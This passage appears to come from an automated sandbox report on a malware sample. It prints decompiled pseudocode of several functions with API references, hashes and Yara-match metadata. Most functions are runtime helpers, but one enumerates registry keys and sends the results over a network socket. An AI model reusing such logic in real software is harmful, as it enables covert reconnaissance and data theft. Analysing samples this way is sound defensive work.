													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E004294CB(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E00437795(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E004459A0( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0043C503( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E00432914();
					_t219 = 0x16;
					 *_t148 = _t219;
					E00430C7A();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}





















































































                                            0x0043c15e
                                            0x0043c161
                                            0x0043c167
                                            0x0043c17f
                                            0x0043c182
                                            0x0043c186
                                            0x0043c188
                                            0x0043c18a
                                            0x0043c18c
                                            0x0043c18f
                                            0x0043c192
                                            0x0043c195
                                            0x0043c197
                                            0x0043c1ef
                                            0x0043c1ef
                                            0x0043c1f5
                                            0x0043c1f7
                                            0x0043c202
                                            0x0043c206
                                            0x0043c208
                                            0x0043c20b
                                            0x0043c20f
                                            0x0043c20f
                                            0x0043c211
                                            0x0043c213
                                            0x0043c215
                                            0x0043c217
                                            0x0043c217
                                            0x0043c219
                                            0x0043c21c
                                            0x0043c21f
                                            0x0043c21f
                                            0x0043c221
                                            0x0043c222
                                            0x0043c222
                                            0x0043c22d
                                            0x0043c22f
                                            0x0043c232
                                            0x0043c233
                                            0x0043c236
                                            0x0043c236
                                            0x0043c23a
                                            0x0043c23d
                                            0x0043c240
                                            0x0043c240
                                            0x0043c24e
                                            0x0043c250
                                            0x0043c253
                                            0x0043c255
                                            0x0043c25f
                                            0x0043c262
                                            0x0043c265
                                            0x0043c267
                                            0x0043c26a
                                            0x0043c26c
                                            0x0043c2bc
                                            0x0043c2bf
                                            0x0043c2bf
                                            0x0043c2c1
                                            0x00000000
                                            0x0043c26e
                                            0x0043c270
                                            0x0043c270
                                            0x0043c272
                                            0x0043c275
                                            0x0043c275
                                            0x0043c27a
                                            0x0043c27d
                                            0x0043c27d
                                            0x0043c27f
                                            0x0043c280
                                            0x0043c280
                                            0x0043c284
                                            0x0043c287
                                            0x0043c287
                                            0x0043c28a
                                            0x0043c28d
                                            0x0043c29a
                                            0x0043c29f
                                            0x0043c2a2
                                            0x0043c2a4
                                            0x0043c2de
                                            0x0043c2df
                                            0x0043c2e0
                                            0x0043c2e1
                                            0x0043c2e2
                                            0x0043c2e3
                                            0x0043c2e8
                                            0x0043c2ec
                                            0x0043c2ee
                                            0x0043c2ef
                                            0x0043c2f2
                                            0x0043c2f2
                                            0x0043c2f5
                                            0x0043c2f5
                                            0x0043c2f7
                                            0x0043c2f8
                                            0x0043c2f8
                                            0x0043c301
                                            0x0043c302
                                            0x0043c305
                                            0x0043c308
                                            0x0043c30b
                                            0x0043c30d
                                            0x0043c314
                                            0x0043c316
                                            0x0043c319
                                            0x0043c323
                                            0x0043c326
                                            0x0043c327
                                            0x0043c329
                                            0x0043c33d
                                            0x0043c33d
                                            0x0043c340
                                            0x0043c34a
                                            0x0043c34f
                                            0x0043c352
                                            0x0043c354
                                            0x00000000
                                            0x0043c356
                                            0x0043c35a
                                            0x0043c363
                                            0x0043c369
                                            0x00000000
                                            0x0043c36c
                                            0x0043c32b
                                            0x0043c32b
                                            0x0043c331
                                            0x0043c336
                                            0x0043c339
                                            0x0043c33b
                                            0x0043c372
                                            0x0043c374
                                            0x0043c375
                                            0x0043c376
                                            0x0043c377
                                            0x0043c378
                                            0x0043c379
                                            0x0043c37e
                                            0x0043c381
                                            0x0043c382
                                            0x0043c384
                                            0x0043c38a
                                            0x0043c391
                                            0x0043c394
                                            0x0043c397
                                            0x0043c398
                                            0x0043c39b
                                            0x0043c39c
                                            0x0043c39f
                                            0x0043c3a0
                                            0x0043c3c1
                                            0x0043c3c1
                                            0x0043c3c3
                                            0x00000000
                                            0x00000000
                                            0x0043c3a8
                                            0x0043c3aa
                                            0x0043c3ac
                                            0x0043c3ae
                                            0x0043c3b0
                                            0x0043c3b2
                                            0x0043c3b4
                                            0x0043c3bf
                                            0x00000000
                                            0x0043c3bf
                                            0x0043c3b4
                                            0x0043c3b0
                                            0x00000000
                                            0x0043c3ac
                                            0x0043c3c5
                                            0x0043c3c7
                                            0x0043c3ca
                                            0x0043c3e3
                                            0x0043c3e3
                                            0x0043c3e5
                                            0x0043c3e8
                                            0x0043c3f8
                                            0x0043c3fa
                                            0x0043c3fa
                                            0x0043c3ea
                                            0x0043c3ea
                                            0x0043c3ed
                                            0x00000000
                                            0x0043c3ef
                                            0x0043c3ef
                                            0x0043c3f2
                                            0x00000000
                                            0x0043c3f4
                                            0x0043c3f4
                                            0x0043c3f4
                                            0x0043c3f2
                                            0x0043c3ed
                                            0x0043c408
                                            0x0043c40c
                                            0x0043c41a
                                            0x0043c41f
                                            0x0043c434
                                            0x0043c436
                                            0x0043c43c
                                            0x0043c43f
                                            0x0043c471
                                            0x0043c471
                                            0x0043c476
                                            0x0043c47c
                                            0x0043c47c
                                            0x0043c483
                                            0x0043c49d
                                            0x0043c49d
                                            0x0043c49e
                                            0x0043c4a4
                                            0x0043c4aa
                                            0x0043c4ab
                                            0x0043c4ac
                                            0x0043c4b1
                                            0x0043c4b4
                                            0x0043c4b6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043c485
                                            0x0043c485
                                            0x0043c48b
                                            0x0043c48d
                                            0x00000000
                                            0x0043c48f
                                            0x0043c48f
                                            0x0043c492
                                            0x00000000
                                            0x0043c494
                                            0x0043c494
                                            0x0043c49b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043c49b
                                            0x0043c492
                                            0x0043c48d
                                            0x00000000
                                            0x0043c4b8
                                            0x0043c4c0
                                            0x0043c4c6
                                            0x0043c4c8
                                            0x0043c4c8
                                            0x0043c4d0
                                            0x0043c4d5
                                            0x0043c4dd
                                            0x0043c4e0
                                            0x0043c4e2
                                            0x0043c4f6
                                            0x0043c4fb
                                            0x0043c441
                                            0x0043c441
                                            0x0043c442
                                            0x0043c443
                                            0x0043c444
                                            0x0043c445
                                            0x0043c44d
                                            0x0043c44d
                                            0x0043c44d
                                            0x0043c44f
                                            0x0043c452
                                            0x0043c455
                                            0x0043c455
                                            0x0043c3cc
                                            0x0043c3cf
                                            0x0043c3d1
                                            0x00000000
                                            0x0043c3d3
                                            0x0043c3d3
                                            0x0043c3d6
                                            0x0043c3d7
                                            0x0043c3d8
                                            0x0043c3d9
                                            0x0043c3de
                                            0x0043c3d1
                                            0x0043c45d
                                            0x0043c462
                                            0x0043c46d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043c33b
                                            0x0043c30f
                                            0x0043c311
                                            0x0043c36d
                                            0x0043c371
                                            0x0043c371
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043c2a6
                                            0x0043c2a9
                                            0x0043c2ac
                                            0x0043c2af
                                            0x0043c2b2
                                            0x0043c2b5
                                            0x0043c2b8
                                            0x0043c2b8
                                            0x00000000
                                            0x0043c275
                                            0x0043c257
                                            0x0043c257
                                            0x0043c2c3
                                            0x0043c2c5
                                            0x00000000
                                            0x0043c2ca
                                            0x0043c199
                                            0x0043c199
                                            0x0043c19c
                                            0x0043c1a5
                                            0x0043c1a8
                                            0x0043c1af
                                            0x0043c1b1
                                            0x0043c1ca
                                            0x0043c1cb
                                            0x0043c1cc
                                            0x0043c1ce
                                            0x0043c1d3
                                            0x0043c1b3
                                            0x0043c1b3
                                            0x0043c1b6
                                            0x0043c1b7
                                            0x0043c1b9
                                            0x0043c1bb
                                            0x0043c1bd
                                            0x0043c1c2
                                            0x0043c1c2
                                            0x0043c1d6
                                            0x0043c1d8
                                            0x0043c1da
                                            0x00000000
                                            0x00000000
                                            0x0043c1e0
                                            0x0043c1e3
                                            0x0043c1e5
                                            0x0043c1e7
                                            0x00000000
                                            0x0043c1e9
                                            0x0043c1e9
                                            0x0043c1ec
                                            0x00000000
                                            0x0043c1ec
                                            0x00000000
                                            0x0043c1e7
                                            0x0043c2cb
                                            0x0043c2ce
                                            0x0043c2d3
                                            0x00000000
                                            0x0043c2d6
                                            0x0043c169
                                            0x0043c169
                                            0x0043c170
                                            0x0043c171
                                            0x0043c173
                                            0x0043c178
                                            0x0043c2d7
                                            0x0043c2db
                                            0x0043c2db
                                            0x00000000

                                            APIs
                                            • _free.LIBCMT ref: 0043C2C5
                                              • Part of subcall function 00430CA7: IsProcessorFeaturePresent.KERNEL32(00000017,00430C79,00000000,00000000,00461210,00000000,00000000,00000000,00461210,?,00430C99,00000000,00000000,00000000,00000000,00000000), ref: 00430CA9
                                              • Part of subcall function 00430CA7: GetCurrentProcess.KERNEL32(C0000417), ref: 00430CCB
                                              • Part of subcall function 00430CA7: TerminateProcess.KERNEL32(00000000), ref: 00430CD2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                            • String ID: *?$.
                                            • API String ID: 2667617558-3972193922
                                            • Opcode ID: 6a7bf23a1edcf56082f86dc25444da317de7f2bf7878cf5a82162c6f50c853fa
                                            • Instruction ID: fe8b21fe100dec85dbd73552987166f6077337ab6fcd844f1a1bddad2831ca34
                                            • Opcode Fuzzy Hash: 6a7bf23a1edcf56082f86dc25444da317de7f2bf7878cf5a82162c6f50c853fa
                                            • Instruction Fuzzy Hash: BE51B171E00209EFDF14CFA9C881AAEB7B5EF5C314F2481AEE854E7341E6399E018B54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040BE4D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E0040BE4D(short* __ecx, char __edx, void* __eflags, char _a4) {
				char _v5;
				void* _v12;
				char _v36;
				char _v60;
				char _v84;
				char _v108;
				char _v132;
				char _v156;
				char _v180;
				char _v204;
				char _v228;
				void* __ebx;
				void* _t28;
				void* _t35;
				void* _t36;
				void* _t61;
				short* _t116;
				void* _t120;
				void* _t121;
				void* _t122;

				_t103 = __edx;
				_t121 = _t120 - 0x18;
				_v5 = __edx;
				_t116 = __ecx;
				E004020E6(_t61, _t121, __edx, __eflags,  &_a4);
				_t28 = E0040BDBC(_t61, __eflags);
				_t122 = _t121 + 0x18;
				_t62 = 0;
				if(RegOpenKeyExW(_t28, _t116, 0, 0x20019,  &_v12) != 0) {
					E0040207E(0, _t122 - 0x18, "3");
					_push(0x72);
					E00401790(0, 0x461378, _t103, __eflags);
				} else {
					E0040BB95(_v12);
					_t35 = E004111F2(0,  &_v228, 0x461348);
					_t36 = E004111F2(0x461330,  &_v204, 0x461330);
					_t127 = _v5;
					_t107 =  ==  ? "0" : "1";
					E00404095(0x461330, _t122 - 0x18, E00404095(0x461330,  &_v36, E00404095(0x461330,  &_v60, E00404095(0x461330,  &_v84, E00405870( &_v108, E00404095(0x461330,  &_v132, E00405870( &_v156, E004059DC( &_v180,  ==  ? "0" : "1", _v5, 0x46103c), _t36), _v5, 0x46103c), _t35), _v5, 0x46103c), _t127, 0x461360), _t127, 0x46103c), _t127, 0x4613e0);
					_push(0x71);
					E00401790(0x461330, 0x461378, _t44, _t127);
					E00401F97();
					E00401F97();
					E00401F97();
					E00401F97();
					E00401F97();
					E00401F97();
					E00401F97();
					E00401F97();
					E00401F97();
					E00409BB0(0x461330, 0x461348, 0x45595c);
					E00409BB0(0x461330, 0x461330, 0x45595c);
					E00403BFE(0x461330, 0x461360, 0x4554cc);
					E00403BFE(0x461330, 0x4613e0, 0x4554cc);
					RegCloseKey(_v12);
					_t62 = 1;
				}
				E00401F97();
				return _t62;
			}























                                            0x0040be4d
                                            0x0040be59
                                            0x0040be5c
                                            0x0040be5f
                                            0x0040be67
                                            0x0040be6c
                                            0x0040be71
                                            0x0040be77
                                            0x0040be8a
                                            0x0040bfea
                                            0x0040bfef
                                            0x0040bff6
                                            0x0040be90
                                            0x0040be93
                                            0x0040beb9
                                            0x0040becd
                                            0x0040bed2
                                            0x0040bee8
                                            0x0040bf3a
                                            0x0040bf40
                                            0x0040bf47
                                            0x0040bf4f
                                            0x0040bf57
                                            0x0040bf5f
                                            0x0040bf67
                                            0x0040bf6f
                                            0x0040bf7a
                                            0x0040bf85
                                            0x0040bf90
                                            0x0040bf9b
                                            0x0040bfab
                                            0x0040bfb3
                                            0x0040bfc3
                                            0x0040bfce
                                            0x0040bfd6
                                            0x0040bfdc
                                            0x0040bfdc
                                            0x0040bffe
                                            0x0040c00b

                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 0040BE82
                                              • Part of subcall function 0040BB95: RegQueryInfoKeyW.ADVAPI32 ref: 0040BBFC
                                              • Part of subcall function 0040BB95: RegEnumKeyExW.ADVAPI32 ref: 0040BC2B
                                              • Part of subcall function 00401790: send.WS2_32(?,00000000,00000000,00000000), ref: 00401804
                                            • RegCloseKey.ADVAPI32(?,004554CC,004554CC,0045595C,0045595C), ref: 0040BFD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEnumInfoOpenQuerysend
                                            • String ID: \YE
                                            • API String ID: 3114080316-4146617796
                                            • Opcode ID: 24da3fde04b70ac882340329fb09a6a50b960a224adef64dd42b9cf820c2ef43
                                            • Instruction ID: 9b49f5650227f8ad59580c88ca3a03529ab98cff4faf4e9a31d55200e179db54
                                            • Opcode Fuzzy Hash: 24da3fde04b70ac882340329fb09a6a50b960a224adef64dd42b9cf820c2ef43
                                            • Instruction Fuzzy Hash: 2241C231A102186AC704B766CC52AEE7775AF51318F40417FB506BB2E2EF385E898A9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043F5A7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E0043F5A7(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				void* __esi;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t23 = _a4;
				_push(_t34);
				if(_t23 == 0) {
					L21:
					_t15 = E004380A8(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t34 = 0x44fe78;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t34) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t36 = 0x44fe80;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t36) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t48 = _t17;
								if(_t17 != 0) {
									_t16 = E0043206F(_t23, _t23);
									goto L25;
								}
								if(E004380A8(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t36 = _t36 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t34 = _t34 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}


















                                            0x0043f5ac
                                            0x0043f5ad
                                            0x0043f5b0
                                            0x0043f5b4
                                            0x0043f65a
                                            0x0043f66e
                                            0x0043f673
                                            0x0043f675
                                            0x0043f67b
                                            0x0043f67e
                                            0x0043f680
                                            0x0043f682
                                            0x0043f682
                                            0x0043f688
                                            0x0043f68d
                                            0x0043f68d
                                            0x0043f677
                                            0x0043f677
                                            0x00000000
                                            0x0043f677
                                            0x0043f5ba
                                            0x0043f5bf
                                            0x00000000
                                            0x00000000
                                            0x0043f5c5
                                            0x0043f5ca
                                            0x0043f5cc
                                            0x0043f5cc
                                            0x0043f5d2
                                            0x00000000
                                            0x00000000
                                            0x0043f5d7
                                            0x0043f5ee
                                            0x0043f5ee
                                            0x0043f5f7
                                            0x0043f5f9
                                            0x00000000
                                            0x00000000
                                            0x0043f5fb
                                            0x0043f600
                                            0x0043f602
                                            0x0043f602
                                            0x0043f608
                                            0x00000000
                                            0x00000000
                                            0x0043f60d
                                            0x0043f62b
                                            0x0043f62b
                                            0x0043f62d
                                            0x0043f652
                                            0x00000000
                                            0x0043f657
                                            0x0043f64a
                                            0x00000000
                                            0x00000000
                                            0x0043f64c
                                            0x00000000
                                            0x0043f64c
                                            0x0043f60f
                                            0x0043f617
                                            0x00000000
                                            0x00000000
                                            0x0043f619
                                            0x0043f61c
                                            0x0043f622
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043f624
                                            0x0043f626
                                            0x0043f628
                                            0x0043f628
                                            0x00000000
                                            0x0043f628
                                            0x0043f5d9
                                            0x0043f5e1
                                            0x00000000
                                            0x00000000
                                            0x0043f5e3
                                            0x0043f5e6
                                            0x0043f5ec
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043f5ec
                                            0x0043f5f2
                                            0x0043f5f4
                                            0x0043f5f4
                                            0x00000000

                                            APIs
                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043F802,?,00000050,?,?,?,?,?), ref: 0043F682
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ACP$OCP
                                            • API String ID: 0-711371036
                                            • Opcode ID: ef7a7262c65b3aa4814b0a62472d144b6cded989cf6f2c76fe5400e4c64d3579
                                            • Instruction ID: a2a6a66b504288e93ee19e0581c1f3247a0f8387f648f3ae67baf5d80076a9e7
                                            • Opcode Fuzzy Hash: ef7a7262c65b3aa4814b0a62472d144b6cded989cf6f2c76fe5400e4c64d3579
                                            • Instruction Fuzzy Hash: 6721C762E00101A6E7348B648D0279773A6DB6CB51F56607AE90AD7311E73ADD0AC35C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043995A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E0043995A(void* __eflags, intOrPtr* _a4) {
				void* _t14;
				void* _t16;
				intOrPtr _t19;
				intOrPtr _t25;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;

				_t38 = _a4;
				if(E00444533(E0043991F(_t38)) != 0) {
					_t14 = E0042ED9F(1);
					_t25 = 2;
					if(_t38 != _t14) {
						if(_t38 != E0042ED9F(_t25)) {
							L12:
							_t16 = 0;
							L13:
							return _t16;
						}
						_t37 = 0x46092c;
						L6:
						 *0x46039c =  *0x46039c + 1;
						_t31 = _t38 + 0xc;
						if(( *(_t38 + 0xc) & 0x000004c0) != 0) {
							goto L12;
						}
						asm("lock or [ecx], eax");
						_t19 =  *_t37;
						if(_t19 != 0) {
							L10:
							 *((intOrPtr*)(_t38 + 4)) = _t19;
							 *_t38 =  *_t37;
							 *((intOrPtr*)(_t38 + 8)) = 0x1000;
							 *((intOrPtr*)(_t38 + 0x18)) = 0x1000;
							L11:
							_t16 = 1;
							goto L13;
						}
						 *_t37 = E00436F33(_t31, 0x1000);
						E00437795(0);
						_t19 =  *_t37;
						if(_t19 != 0) {
							goto L10;
						}
						_t34 = _t38 + 0x14;
						 *((intOrPtr*)(_t38 + 8)) = _t25;
						 *((intOrPtr*)(_t38 + 4)) = _t34;
						 *_t38 = _t34;
						 *((intOrPtr*)(_t38 + 0x18)) = _t25;
						goto L11;
					}
					_t37 = 0x460928;
					goto L6;
				}
				return 0;
			}










                                            0x00439960
                                            0x00439973
                                            0x00439980
                                            0x00439988
                                            0x0043998b
                                            0x0043999d
                                            0x00439a08
                                            0x00439a08
                                            0x00439a0a
                                            0x00000000
                                            0x00439a0b
                                            0x0043999f
                                            0x004399a4
                                            0x004399a4
                                            0x004399aa
                                            0x004399b4
                                            0x00000000
                                            0x00000000
                                            0x004399bb
                                            0x004399be
                                            0x004399c2
                                            0x004399ef
                                            0x004399ef
                                            0x004399f4
                                            0x004399f6
                                            0x004399fd
                                            0x00439a04
                                            0x00439a04
                                            0x00000000
                                            0x00439a04
                                            0x004399d0
                                            0x004399d2
                                            0x004399d7
                                            0x004399dd
                                            0x00000000
                                            0x00000000
                                            0x004399df
                                            0x004399e2
                                            0x004399e5
                                            0x004399e8
                                            0x004399ea
                                            0x00000000
                                            0x004399ea
                                            0x0043998d
                                            0x00000000
                                            0x0043998d
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free
                                            • String ID: (F$,F
                                            • API String ID: 269201875-3254291621
                                            • Opcode ID: 83f95a64fdf50b1ade36da56912ac70d7c7a814315fde7e154f5749283816ff9
                                            • Instruction ID: 713b056caa0524d336b860ca33bf9503082b5bce4ad5aabc9f8abf927872c318
                                            • Opcode Fuzzy Hash: 83f95a64fdf50b1ade36da56912ac70d7c7a814315fde7e154f5749283816ff9
                                            • Instruction Fuzzy Hash: 361129B1104342AFEB20AF2AD441B5777E4EF093A8F20641FE14987382E7B9DC41874C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00436F81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E00436F81(void* __ecx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t13;
				long _t15;

				_t10 = __ecx;
				_t13 = _a4;
				if(_t13 != 0) {
					_t15 = _a8;
					__eflags = _t15;
					if(_t15 != 0) {
						__eflags = _t15 - 0xffffffe0;
						if(_t15 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0x46096c, 0, _t13, _t15);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E0043656D();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E0043400B(_t10, _t15, __eflags, _t15);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00432914())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00437795(_t13);
					goto L6;
				}
				return E00436F33(__ecx, _a8);
			}








                                            0x00436f81
                                            0x00436f87
                                            0x00436f8c
                                            0x00436f9a
                                            0x00436f9d
                                            0x00436f9f
                                            0x00436faa
                                            0x00436fad
                                            0x00436fd4
                                            0x00436fde
                                            0x00436fe4
                                            0x00436fe6
                                            0x00000000
                                            0x00000000
                                            0x00436fc5
                                            0x00436fc7
                                            0x00000000
                                            0x00000000
                                            0x00436fca
                                            0x00436fcf
                                            0x00436fd0
                                            0x00436fd2
                                            0x00000000
                                            0x00000000
                                            0x00436fd2
                                            0x00436fbc
                                            0x00000000
                                            0x00436fbc
                                            0x00436faf
                                            0x00436fb4
                                            0x00436fba
                                            0x00436fba
                                            0x00436fba
                                            0x00000000
                                            0x00436fba
                                            0x00436fa2
                                            0x00000000
                                            0x00436fa7
                                            0x00000000

                                            APIs
                                            • _free.LIBCMT ref: 00436FA2
                                              • Part of subcall function 00436F33: RtlAllocateHeap.NTDLL(00000000,0042979C,?,?,0042AEE7,?,?,3.1.4 Light,?,?,0040869A,0042979C,?,?,?,?), ref: 00436F65
                                            • HeapReAlloc.KERNEL32(00000000,00000048,?,u7B,00000006,?,004274AF,?,00000006,0042406F,u7B,00000008,0042445A,00000008,u7B,004243CB), ref: 00436FDE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocAllocate_free
                                            • String ID: u7B
                                            • API String ID: 2447670028-2779706145
                                            • Opcode ID: cb4613d2181250ecefe7e7884c97bc2bd38b4a974634622969b13dd413417cfd
                                            • Instruction ID: 131c854aafbc4a9c17414efb1d7db32cb982e1cca11928ccfbfd150d1e2ee46a
                                            • Opcode Fuzzy Hash: cb4613d2181250ecefe7e7884c97bc2bd38b4a974634622969b13dd413417cfd
                                            • Instruction Fuzzy Hash: 03F0C8312051137ADF212A26FC00A6B776D9F89774F27A12BF8146B290DB6CD80195AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409050, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00409050() {
				void* __esi;

				if( *0x4627e4 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E00428B91(0x4627e4);
					_t17 =  *0x4627e4 - 0xffffffff;
					if( *0x4627e4 == 0xffffffff) {
						E0040B26D();
						E00428A31(_t17, 0x448c0e);
						E00428B52(0x4627e4, 0x4627e4);
					}
				}
				return 0x4627e8;
			}




                                            0x0040af67
                                            0x0040af70
                                            0x0040af75
                                            0x0040af7d
                                            0x0040af7f
                                            0x0040af89
                                            0x0040af8f
                                            0x0040af95
                                            0x0040af96
                                            0x0040af9c

                                            APIs
                                              • Part of subcall function 00428A31: __onexit.LIBCMT ref: 00428A37
                                            • __Init_thread_footer.LIBCMT ref: 0040AF8F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
